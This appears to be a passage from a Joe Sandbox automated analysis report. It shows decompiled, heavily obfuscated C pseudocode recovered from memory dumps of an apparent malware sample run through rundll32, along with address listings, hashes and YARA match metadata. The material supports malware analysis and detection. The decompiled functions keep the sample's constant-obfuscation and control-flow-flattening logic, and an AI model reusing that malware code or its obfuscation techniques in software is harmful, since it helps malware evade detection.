				_v20 = _v20 ^ 0x0000ddf0;
				_v48 = 0x380;
				_v48 = _v48 ^ 0x907d2ab9;
				_v48 = _v48 + 0x250e;
				_v48 = _v48 ^ 0x907d1045;
				_v52 = 0x47eb;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 + 0xffff29cf;
				_v52 = _v52 ^ 0xffff09ac;
				_v24 = 0x6d24;
				_v24 = _v24 / _t153;
				_v24 = _v24 ^ 0x0000449d;
				_v28 = 0xbb34;
				_v28 = _v28 + 0xffffe3e2;
				_v28 = _v28 ^ 0x00008aa5;
				_v32 = 0x42c0;
				_v32 = _v32 << 8;
				_v32 = _v32 ^ 0x004292e1;
				_v36 = 0x1d03;
				_v36 = _v36 | 0xc4a3f1ad;
				_v36 = _v36 ^ 0xc4a39a93;
				_v40 = 0x16bd;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x0016fb39;
				_v44 = 0x384e;
				_t154 = 0x3b;
				_v44 = _v44 / _t154;
				_v44 = _v44 ^ 0x00003cb9;
				_v64 = 0x6f3c;
				_v64 = _v64 + 0x49f0;
				_v64 = _v64 * 0x12;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x00002a42;
				_v8 = 0x21c3;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x010e5853;
				_v12 = 0xc49d;
				_v12 = _v12 << 0xb;
				_v12 = _v12 ^ 0x0624cbc5;
				_v16 = 0x33ea;
				_v16 = _v16 + 0xffff095d;
				_v16 = _v16 ^ 0xffff1135;
				_v56 = 0x9287;
				_v56 = _v56 * 0x3d;
				_v56 = _v56 | 0xa9bdb70a;
				_v56 = _v56 ^ 0x6edfa2bf;
				_v56 = _v56 ^ 0xc7607732;
				_t155 = _v4;
				do {
					while(_t141 != 0x213a8f08) {
						if(_t141 == 0x27f2e66a) {
							_t135 = E02002878(_t155,  &_v4, _v48, _v52, _v24);
							_t160 =  &(_t160[3]);
							if(_t135 != 0) {
								_t141 = 0x2db65059;
								continue;
							}
						} else {
							if(_t141 == 0x29395626) {
								E01FFF1ED(_v8, _v12, _v16, _v56, _v4);
							} else {
								if(_t141 == 0x2a642033) {
									_t141 = 0x213a8f08;
									continue;
								} else {
									if(_t141 != 0x2db65059) {
										goto L13;
									} else {
										_t105 =  &_v64; // 0x9
										E01FF3850(_v4, 1, _v28, _t141, 1, _v32, _v36, _v40, _v44, _t139,  *_t105, _a8);
										_t160 =  &(_t160[0xa]);
										_t141 = 0x29395626;
										_t156 =  !=  ? 1 : _t156;
										continue;
									}
								}
							}
						}
						L16:
						return _t156;
					}
					_t134 = E01FFF2AB();
					_t155 = _t134;
					if(_t134 == 0xffffffff) {
						_t141 = 0x3912b486;
						goto L13;
					} else {
						_t141 = 0x27f2e66a;
						continue;
					}
					goto L16;
					L13:
				} while (_t141 != 0x3912b486);
				goto L16;
			}




























                                                                      0x01ff333d
                                                                      0x01ff3343
                                                                      0x01ff3345
                                                                      0x01ff334a
                                                                      0x01ff334b
                                                                      0x01ff334f
                                                                      0x01ff3350
                                                                      0x01ff3351
                                                                      0x01ff3352
                                                                      0x01ff3357
                                                                      0x01ff335f
                                                                      0x01ff3362
                                                                      0x01ff336c
                                                                      0x01ff3371
                                                                      0x01ff3378
                                                                      0x01ff337f
                                                                      0x01ff3382
                                                                      0x01ff3386
                                                                      0x01ff338e
                                                                      0x01ff3396
                                                                      0x01ff339e
                                                                      0x01ff33a6
                                                                      0x01ff33ae
                                                                      0x01ff33b6
                                                                      0x01ff33be
                                                                      0x01ff33c6
                                                                      0x01ff33ce
                                                                      0x01ff33d3
                                                                      0x01ff33db
                                                                      0x01ff33e3
                                                                      0x01ff33f3
                                                                      0x01ff33f7
                                                                      0x01ff33ff
                                                                      0x01ff3407
                                                                      0x01ff340f
                                                                      0x01ff3417
                                                                      0x01ff341f
                                                                      0x01ff3424
                                                                      0x01ff342c
                                                                      0x01ff3434
                                                                      0x01ff343c
                                                                      0x01ff3444
                                                                      0x01ff344c
                                                                      0x01ff3451
                                                                      0x01ff3459
                                                                      0x01ff3465
                                                                      0x01ff3468
                                                                      0x01ff346c
                                                                      0x01ff3474
                                                                      0x01ff347c
                                                                      0x01ff3489
                                                                      0x01ff348d
                                                                      0x01ff3492
                                                                      0x01ff349a
                                                                      0x01ff34a2
                                                                      0x01ff34a7
                                                                      0x01ff34af
                                                                      0x01ff34b7
                                                                      0x01ff34bc
                                                                      0x01ff34c4
                                                                      0x01ff34cc
                                                                      0x01ff34d4
                                                                      0x01ff34dc
                                                                      0x01ff34e9
                                                                      0x01ff34ed
                                                                      0x01ff34f5
                                                                      0x01ff34fd
                                                                      0x01ff3505
                                                                      0x01ff3509
                                                                      0x01ff3509
                                                                      0x01ff351b
                                                                      0x01ff358f
                                                                      0x01ff3594
                                                                      0x01ff3599
                                                                      0x01ff359b
                                                                      0x00000000
                                                                      0x01ff359b
                                                                      0x01ff351d
                                                                      0x01ff3523
                                                                      0x01ff35ea
                                                                      0x01ff3529
                                                                      0x01ff352f
                                                                      0x01ff3576
                                                                      0x00000000
                                                                      0x01ff3531
                                                                      0x01ff3537
                                                                      0x00000000
                                                                      0x01ff353d
                                                                      0x01ff3543
                                                                      0x01ff3562
                                                                      0x01ff3567
                                                                      0x01ff356a
                                                                      0x01ff3571
                                                                      0x00000000
                                                                      0x01ff3571
                                                                      0x01ff3537
                                                                      0x01ff352f
                                                                      0x01ff3523
                                                                      0x01ff35f3
                                                                      0x01ff35fb
                                                                      0x01ff35fb
                                                                      0x01ff35ad
                                                                      0x01ff35b2
                                                                      0x01ff35b7
                                                                      0x01ff35c3
                                                                      0x00000000
                                                                      0x01ff35b9
                                                                      0x01ff35b9
                                                                      0x00000000
                                                                      0x01ff35b9
                                                                      0x00000000
                                                                      0x01ff35c8
                                                                      0x01ff35c8
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B*$B*$$m$&V9)$&V9)$3 d*$3 d*$B*$N8$3$G$X
                                                                      • API String ID: 0-1096093052
                                                                      • Opcode ID: 521acd00a0da17cdbf2c41cbea6d9d8a89f3cfc0f17e08e26cf1249a71e27ffd
                                                                      • Instruction ID: ee542c56d035fbbfd5b71d3b09a142fd17f1aff4b0a0803b0dd5eec5572add3b
                                                                      • Opcode Fuzzy Hash: 521acd00a0da17cdbf2c41cbea6d9d8a89f3cfc0f17e08e26cf1249a71e27ffd
                                                                      • Instruction Fuzzy Hash: 676154B1508342DBD358CF25C88981BBEF1BFD4748F504A0DF692962A0D7B6CA49CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002328AA, Relevance: 15.2, Strings: 12, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B*$B*$$m$&V9)$&V9)$3 d*$3 d*$B*$N8$3$G$X
                                                                      • API String ID: 0-1096093052
                                                                      • Opcode ID: 79a5d864f846127270572b84529ccbb0276f247360850f9f8f4a9f3641cbf1bc
                                                                      • Instruction ID: 0f9f6d76282d4fe0afae27a3d127e7995789f6ea30aceee7489c53d8a5719e47
                                                                      • Opcode Fuzzy Hash: 79a5d864f846127270572b84529ccbb0276f247360850f9f8f4a9f3641cbf1bc
                                                                      • Instruction Fuzzy Hash: 486164B1518341DBD358CF24C98981BBBF6FBD4748F104A0DF592922A0D3B6CA69CB87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFD6F0, Relevance: 12.9, Strings: 10, Instructions: 379COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 81%
                                                                      			E01FFD6F0(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
				char _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				char _v1592;
				signed int _v1636;
				signed int _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				void* _t364;
				void* _t401;
				signed int _t407;
				signed int _t408;
				void* _t418;
				signed int _t424;
				void* _t467;
				signed int _t477;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				intOrPtr* _t492;
				signed int* _t494;

				_push(_a24);
				_t492 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t364);
				_v1640 = _v1640 & 0x00000000;
				_t494 =  &(( &_v1792)[8]);
				_v1652 = 0x2764d0;
				_v1648 = 0x6c10e;
				_t418 = 0x1a59bf6e;
				_v1644 = 0x45b7d3;
				_v1736 = 0x69d7;
				_t479 = 0x7c;
				_v1736 = _v1736 / _t479;
				_v1736 = _v1736 ^ 0x22ae46e4;
				_v1736 = _v1736 ^ 0x22ae462e;
				_v1692 = 0x6229;
				_t480 = 0x2d;
				_v1692 = _v1692 * 0x79;
				_v1692 = _v1692 ^ 0x002e5d85;
				_v1668 = 0x3eca;
				_v1668 = _v1668 * 0x4a;
				_v1668 = _v1668 ^ 0x001246b9;
				_v1664 = 0xb443;
				_v1664 = _v1664 ^ 0x9e62129a;
				_v1664 = _v1664 ^ 0x9e62966b;
				_v1776 = 0xc910;
				_v1776 = _v1776 ^ 0xd3b19c76;
				_v1776 = _v1776 * 0x5f;
				_v1776 = _v1776 >> 4;
				_v1776 = _v1776 ^ 0x08ec90a2;
				_v1724 = 0x4482;
				_v1724 = _v1724 | 0x42708b7b;
				_v1724 = _v1724 + 0xddd;
				_v1724 = _v1724 ^ 0x4270d568;
				_v1688 = 0xa58d;
				_v1688 = _v1688 / _t480;
				_v1688 = _v1688 ^ 0x00002f12;
				_v1768 = 0x1117;
				_v1768 = _v1768 ^ 0xb27fbd06;
				_v1768 = _v1768 ^ 0xbad7b42c;
				_v1768 = _v1768 << 5;
				_v1768 = _v1768 ^ 0x1503361b;
				_v1748 = 0x59e9;
				_t481 = 0x76;
				_v1748 = _v1748 / _t481;
				_v1748 = _v1748 * 0x1b;
				_v1748 = _v1748 ^ 0x0000781f;
				_v1712 = 0x12f;
				_v1712 = _v1712 >> 1;
				_v1712 = _v1712 * 0x54;
				_v1712 = _v1712 ^ 0x000029cb;
				_v1760 = 0x769d;
				_v1760 = _v1760 ^ 0x1d97fecb;
				_v1760 = _v1760 | 0x5a049cf7;
				_v1760 = _v1760 >> 8;
				_v1760 = _v1760 ^ 0x005fdabd;
				_v1680 = 0x560a;
				_t482 = 0x67;
				_v1680 = _v1680 / _t482;
				_v1680 = _v1680 ^ 0x00006cbe;
				_v1716 = 0x4a9b;
				_t483 = 0x3e;
				_v1716 = _v1716 / _t483;
				_v1716 = _v1716 << 2;
				_v1716 = _v1716 ^ 0x00001699;
				_v1756 = 0xfd39;
				_t484 = 0x41;
				_v1756 = _v1756 / _t484;
				_t485 = 0x3c;
				_v1756 = _v1756 / _t485;
				_v1756 = _v1756 >> 2;
				_v1756 = _v1756 ^ 0x000009f3;
				_v1656 = 0x263f;
				_v1656 = _v1656 | 0xdd3deb07;
				_v1656 = _v1656 ^ 0xdd3d9735;
				_v1728 = 0x8b60;
				_v1728 = _v1728 + 0x7c61;
				_v1728 = _v1728 >> 3;
				_v1728 = _v1728 ^ 0x00004a7c;
				_v1720 = 0x33cd;
				_v1720 = _v1720 ^ 0x1b0fa94f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 ^ 0x00d8342d;
				_v1780 = 0x296b;
				_t477 = 0xd;
				_t486 = 0x1a;
				_v1780 = _v1780 * 0x37;
				_v1780 = _v1780 / _t477;
				_v1780 = _v1780 * 0x68;
				_v1780 = _v1780 ^ 0x00477104;
				_v1708 = 0x1071;
				_v1708 = _v1708 / _t486;
				_v1708 = _v1708 ^ 0x39e628e5;
				_v1708 = _v1708 ^ 0x39e60ecd;
				_v1792 = 0xc8ec;
				_v1792 = _v1792 + 0xffff9509;
				_v1792 = _v1792 << 0x10;
				_v1792 = _v1792 / _t477;
				_v1792 = _v1792 ^ 0x073a38a1;
				_v1672 = 0xf01f;
				_v1672 = _v1672 | 0x8a618a9f;
				_v1672 = _v1672 ^ 0x8a61a479;
				_v1772 = 0x51a6;
				_v1772 = _v1772 << 2;
				_t487 = 0x2c;
				_v1772 = _v1772 / _t487;
				_v1772 = _v1772 >> 5;
				_v1772 = _v1772 ^ 0x000035c3;
				_v1764 = 0xe721;
				_v1764 = _v1764 ^ 0x24f6807f;
				_t488 = 0x53;
				_v1764 = _v1764 / _t488;
				_v1764 = _v1764 + 0xbfd3;
				_v1764 = _v1764 ^ 0x00728456;
				_v1660 = 0x1e86;
				_v1660 = _v1660 ^ 0x7c17f37e;
				_v1660 = _v1660 ^ 0x7c17e05e;
				_v1684 = 0xd777;
				_v1684 = _v1684 + 0xed5a;
				_v1684 = _v1684 ^ 0x0001edaa;
				_v1744 = 0xa784;
				_v1744 = _v1744 + 0xc02;
				_t489 = 0x29;
				_v1744 = _v1744 / _t489;
				_v1744 = _v1744 ^ 0x000021c6;
				_v1696 = 0xdd82;
				_v1696 = _v1696 << 7;
				_v1696 = _v1696 ^ 0x006e89a7;
				_v1784 = 0x58c6;
				_v1784 = _v1784 << 0xd;
				_v1784 = _v1784 * 0x62;
				_v1784 = _v1784 ^ 0x296c6eed;
				_v1784 = _v1784 ^ 0x1615de11;
				_v1676 = 0x84dc;
				_v1676 = _v1676 << 1;
				_v1676 = _v1676 ^ 0x00016dc5;
				_v1740 = 0x8068;
				_v1740 = _v1740 | 0xa8a101a8;
				_v1740 = _v1740 >> 5;
				_v1740 = _v1740 ^ 0x0545556d;
				_v1732 = 0x2f98;
				_v1732 = _v1732 ^ 0x2890ad27;
				_v1732 = _v1732 >> 0xe;
				_v1732 = _v1732 ^ 0x0000a37e;
				_v1788 = 0x1e3f;
				_v1788 = _v1788 >> 5;
				_v1788 = _v1788 | 0x9899bc79;
				_v1788 = _v1788 ^ 0x98e78ce9;
				_v1788 = _v1788 ^ 0x007e0a8e;
				_v1700 = 0x100b;
				_v1700 = _v1700 | 0xf8dcacc8;
				_v1700 = _v1700 ^ 0xf8dcd529;
				_t478 = _v1700;
				_v1752 = 0x332;
				_v1752 = _v1752 << 0xb;
				_v1752 = _v1752 + 0x818f;
				_v1752 = _v1752 << 9;
				_v1752 = _v1752 ^ 0x342347ac;
				_v1704 = 0xaa58;
				_v1704 = _v1704 >> 8;
				_v1704 = _v1704 * 0x6a;
				_v1704 = _v1704 ^ 0x000062e9;
				while(1) {
					L1:
					_t467 = 0x2e;
					L2:
					while(_t418 != 0x15b4e3) {
						if(_t418 == 0xae29669) {
							__eflags = _v1636 & _v1736;
							if(__eflags == 0) {
								_t407 =  *_t492( &_v1636, _a12);
								asm("sbb ecx, ecx");
								_t424 =  ~_t407 & 0x021254c5;
								L9:
								_t418 = _t424 + 0x2bde9c80;
								while(1) {
									L1:
									_t467 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1592 - _t467;
							if(_v1592 != _t467) {
								L19:
								__eflags = _a20;
								if(__eflags != 0) {
									_push(0x1ff13dc);
									_push(_v1780);
									_push(_v1720);
									E01FFA4D7(__eflags, _v1792, _v1672, _v1772, _v1764, E01FF5DFC(_v1656, _v1728, __eflags), _a24,  &_v524,  &_v1592);
									E01FFD6F0(_t492, _v1660, _v1684, _v1744, _a12, _v1696, _a20,  &_v524);
									_t408 = E02000D6D(_v1784, _v1676, _v1740, _t411);
									_t494 =  &(_t494[0x13]);
									_t467 = 0x2e;
								}
								L18:
								_t418 = 0x2df0f145;
								continue;
							}
							__eflags = _v1590;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v1590 - _t467;
							if(_v1590 != _t467) {
								goto L19;
							}
							__eflags = _v1588;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t418 == 0xe2dbff4) {
							_t408 = E02009952( &_v1636,  &_v1044, _v1716, _v1756);
							_t478 = _t408;
							__eflags = _t408 - 0xffffffff;
							if(__eflags == 0) {
								return _t408;
							}
							_t418 = 0xae29669;
							goto L1;
						}
						if(_t418 == 0x1a59bf6e) {
							_t418 = 0x15b4e3;
							continue;
						}
						if(_t418 == 0x2bde9c80) {
							return E01FF991E(_v1700, _v1752, _t478, _v1704);
						}
						if(_t418 != 0x2df0f145) {
							L23:
							__eflags = _t418 - 0xd3f8960;
							if(__eflags != 0) {
								continue;
							}
							return _t408;
						}
						_t408 = E01FF327F(_t478, _v1732,  &_v1636, _v1788);
						asm("sbb ecx, ecx");
						_t424 =  ~_t408 & 0xdf03f9e9;
						goto L9;
					}
					_push(0x1ff140c);
					_push(_v1776);
					_push(_v1664);
					_t401 = E01FF5DFC(_v1692, _v1668, __eflags);
					E01FFECBD(_v1724, __eflags, _v1692, _v1688, _v1768,  &_v1044, _v1748, _a24);
					E02000D6D(_v1712, _v1760, _v1680, _t401);
					_t494 =  &(_t494[0xb]);
					_t418 = 0xe2dbff4;
					_t467 = 0x2e;
					goto L23;
				}
			}





































































                                                                      0x01ffd6f9
                                                                      0x01ffd700
                                                                      0x01ffd702
                                                                      0x01ffd709
                                                                      0x01ffd710
                                                                      0x01ffd717
                                                                      0x01ffd71e
                                                                      0x01ffd725
                                                                      0x01ffd726
                                                                      0x01ffd727
                                                                      0x01ffd72c
                                                                      0x01ffd734
                                                                      0x01ffd737
                                                                      0x01ffd744
                                                                      0x01ffd74f
                                                                      0x01ffd754
                                                                      0x01ffd75f
                                                                      0x01ffd76d
                                                                      0x01ffd772
                                                                      0x01ffd778
                                                                      0x01ffd780
                                                                      0x01ffd788
                                                                      0x01ffd795
                                                                      0x01ffd798
                                                                      0x01ffd79c
                                                                      0x01ffd7a4
                                                                      0x01ffd7b7
                                                                      0x01ffd7be
                                                                      0x01ffd7c9
                                                                      0x01ffd7d4
                                                                      0x01ffd7df
                                                                      0x01ffd7ea
                                                                      0x01ffd7f2
                                                                      0x01ffd7ff
                                                                      0x01ffd803
                                                                      0x01ffd808
                                                                      0x01ffd810
                                                                      0x01ffd818
                                                                      0x01ffd820
                                                                      0x01ffd828
                                                                      0x01ffd830
                                                                      0x01ffd840
                                                                      0x01ffd844
                                                                      0x01ffd84c
                                                                      0x01ffd854
                                                                      0x01ffd85c
                                                                      0x01ffd864
                                                                      0x01ffd869
                                                                      0x01ffd871
                                                                      0x01ffd87d
                                                                      0x01ffd880
                                                                      0x01ffd889
                                                                      0x01ffd88d
                                                                      0x01ffd895
                                                                      0x01ffd89d
                                                                      0x01ffd8a6
                                                                      0x01ffd8aa
                                                                      0x01ffd8b2
                                                                      0x01ffd8ba
                                                                      0x01ffd8c2
                                                                      0x01ffd8ca
                                                                      0x01ffd8cf
                                                                      0x01ffd8d9
                                                                      0x01ffd8e7
                                                                      0x01ffd8ec
                                                                      0x01ffd8f0
                                                                      0x01ffd8f8
                                                                      0x01ffd906
                                                                      0x01ffd90b
                                                                      0x01ffd90f
                                                                      0x01ffd914
                                                                      0x01ffd91c
                                                                      0x01ffd92a
                                                                      0x01ffd92f
                                                                      0x01ffd939
                                                                      0x01ffd93e
                                                                      0x01ffd942
                                                                      0x01ffd947
                                                                      0x01ffd94f
                                                                      0x01ffd95a
                                                                      0x01ffd965
                                                                      0x01ffd970
                                                                      0x01ffd978
                                                                      0x01ffd980
                                                                      0x01ffd985
                                                                      0x01ffd98d
                                                                      0x01ffd995
                                                                      0x01ffd99d
                                                                      0x01ffd9a2
                                                                      0x01ffd9aa
                                                                      0x01ffd9b9
                                                                      0x01ffd9bc
                                                                      0x01ffd9bd
                                                                      0x01ffd9c9
                                                                      0x01ffd9d4
                                                                      0x01ffd9d8
                                                                      0x01ffd9e0
                                                                      0x01ffd9f0
                                                                      0x01ffd9f4
                                                                      0x01ffd9fc
                                                                      0x01ffda04
                                                                      0x01ffda0c
                                                                      0x01ffda14
                                                                      0x01ffda1f
                                                                      0x01ffda23
                                                                      0x01ffda2b
                                                                      0x01ffda36
                                                                      0x01ffda41
                                                                      0x01ffda4c
                                                                      0x01ffda54
                                                                      0x01ffda5f
                                                                      0x01ffda64
                                                                      0x01ffda6a
                                                                      0x01ffda6f
                                                                      0x01ffda77
                                                                      0x01ffda7f
                                                                      0x01ffda8b
                                                                      0x01ffda90
                                                                      0x01ffda96
                                                                      0x01ffda9e
                                                                      0x01ffdaa6
                                                                      0x01ffdab1
                                                                      0x01ffdabc
                                                                      0x01ffdac7
                                                                      0x01ffdacf
                                                                      0x01ffdad7
                                                                      0x01ffdadf
                                                                      0x01ffdae7
                                                                      0x01ffdaf3
                                                                      0x01ffdaf6
                                                                      0x01ffdafa
                                                                      0x01ffdb02
                                                                      0x01ffdb0a
                                                                      0x01ffdb0f
                                                                      0x01ffdb17
                                                                      0x01ffdb1f
                                                                      0x01ffdb29
                                                                      0x01ffdb2d
                                                                      0x01ffdb35
                                                                      0x01ffdb3d
                                                                      0x01ffdb48
                                                                      0x01ffdb4f
                                                                      0x01ffdb5a
                                                                      0x01ffdb62
                                                                      0x01ffdb6a
                                                                      0x01ffdb6f
                                                                      0x01ffdb77
                                                                      0x01ffdb7f
                                                                      0x01ffdb87
                                                                      0x01ffdb8c
                                                                      0x01ffdb94
                                                                      0x01ffdb9c
                                                                      0x01ffdba1
                                                                      0x01ffdba9
                                                                      0x01ffdbb1
                                                                      0x01ffdbb9
                                                                      0x01ffdbc1
                                                                      0x01ffdbc9
                                                                      0x01ffdbd1
                                                                      0x01ffdbd5
                                                                      0x01ffdbdd
                                                                      0x01ffdbe2
                                                                      0x01ffdbea
                                                                      0x01ffdbef
                                                                      0x01ffdbf7
                                                                      0x01ffdbff
                                                                      0x01ffdc09
                                                                      0x01ffdc0d
                                                                      0x01ffdc15
                                                                      0x01ffdc15
                                                                      0x01ffdc17
                                                                      0x00000000
                                                                      0x01ffdc18
                                                                      0x01ffdc2a
                                                                      0x01ffdcc2
                                                                      0x01ffdcc9
                                                                      0x01ffddcb
                                                                      0x01ffddd1
                                                                      0x01ffddd3
                                                                      0x01ffdc7d
                                                                      0x01ffdc7d
                                                                      0x01ffdc15
                                                                      0x01ffdc15
                                                                      0x01ffdc17
                                                                      0x00000000
                                                                      0x01ffdc17
                                                                      0x01ffdc15
                                                                      0x01ffdccf
                                                                      0x01ffdcd7
                                                                      0x01ffdd03
                                                                      0x01ffdd03
                                                                      0x01ffdd0b
                                                                      0x01ffdd0d
                                                                      0x01ffdd12
                                                                      0x01ffdd16
                                                                      0x01ffdd61
                                                                      0x01ffdd97
                                                                      0x01ffddac
                                                                      0x01ffddb1
                                                                      0x01ffddb6
                                                                      0x01ffddb6
                                                                      0x01ffdcf9
                                                                      0x01ffdcf9
                                                                      0x00000000
                                                                      0x01ffdcf9
                                                                      0x01ffdcd9
                                                                      0x01ffdce2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffdce4
                                                                      0x01ffdcec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffdcee
                                                                      0x01ffdcf7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffdcf7
                                                                      0x01ffdc36
                                                                      0x01ffdca2
                                                                      0x01ffdca7
                                                                      0x01ffdcab
                                                                      0x01ffdcae
                                                                      0x01ffde78
                                                                      0x01ffde78
                                                                      0x01ffdcb4
                                                                      0x00000000
                                                                      0x01ffdcb4
                                                                      0x01ffdc3e
                                                                      0x01ffdc85
                                                                      0x00000000
                                                                      0x01ffdc85
                                                                      0x01ffdc46
                                                                      0x00000000
                                                                      0x01ffde6e
                                                                      0x01ffdc52
                                                                      0x01ffde4d
                                                                      0x01ffde4d
                                                                      0x01ffde53
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffde53
                                                                      0x01ffdc6a
                                                                      0x01ffdc75
                                                                      0x01ffdc77
                                                                      0x00000000
                                                                      0x01ffdc77
                                                                      0x01ffddde
                                                                      0x01ffdde3
                                                                      0x01ffdde7
                                                                      0x01ffddf9
                                                                      0x01ffde28
                                                                      0x01ffde3d
                                                                      0x01ffde42
                                                                      0x01ffde45
                                                                      0x01ffde4c
                                                                      0x00000000
                                                                      0x01ffde4c

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !$)b$?&$Z$k)$|J$(9$Y$b$nl)
                                                                      • API String ID: 0-1587503975
                                                                      • Opcode ID: 8f7746d2232358b4ed4bb68738b37b67922b47cda3fa2272ab6ef43d0dfae9a6
                                                                      • Instruction ID: 61c6442bad652ea5a987252e70f42e1c024f5d79024041364fa9494507b9f34a
                                                                      • Opcode Fuzzy Hash: 8f7746d2232358b4ed4bb68738b37b67922b47cda3fa2272ab6ef43d0dfae9a6
                                                                      • Instruction Fuzzy Hash: 9F02037150C3809FE368CF65C58AA5BBBE1BFC4748F10891DE299862A0D7BA9549CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200AA7B, Relevance: 12.9, Strings: 10, Instructions: 360COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E0200AA7B(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char* _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				void* _t311;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t342;
				void* _t344;
				intOrPtr _t346;
				signed int _t348;
				signed int _t352;
				intOrPtr* _t360;
				signed int _t362;
				intOrPtr* _t366;
				intOrPtr _t368;
				intOrPtr* _t373;
				char* _t403;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				char* _t414;
				void* _t415;
				intOrPtr* _t422;
				void* _t424;
				void* _t426;

				_t366 = _a8;
				_push(_t366);
				_push(_a4);
				_t422 = __ecx;
				_push(__edx);
				_push(__ecx);
				E02002550(_t311);
				_v240 = 0x8d7c;
				_t424 =  &_v252 + 0x10;
				_t368 = 0;
				_t415 = 0x41ccc75;
				_v252 = 0;
				_t405 = 0x25;
				_v240 = _v240 / _t405;
				_t406 = 0x2f;
				_v240 = _v240 / _t406;
				_v240 = _v240 << 2;
				_v240 = _v240 ^ 0x00000010;
				_v224 = 0x614;
				_v224 = _v224 + 0xffff1e90;
				_v224 = _v224 >> 9;
				_v224 = _v224 + 0x14db;
				_v224 = _v224 ^ 0x0080146f;
				_v168 = 0x43df;
				_v168 = _v168 + 0xffffc722;
				_v168 = _v168 ^ 0xb717614c;
				_v168 = _v168 ^ 0xb71706dd;
				_v176 = 0xf537;
				_v176 = _v176 + 0xffffdb03;
				_v176 = _v176 | 0xc83cfdf5;
				_v176 = _v176 ^ 0xc83cf680;
				_v156 = 0x6ab9;
				_v156 = _v156 >> 4;
				_v156 = _v156 ^ 0x00005a76;
				_v212 = 0x1163;
				_v212 = _v212 + 0xb834;
				_v212 = _v212 | 0x5ab100ea;
				_v212 = _v212 << 0x10;
				_v212 = _v212 ^ 0xc9ff2941;
				_v184 = 0x14b7;
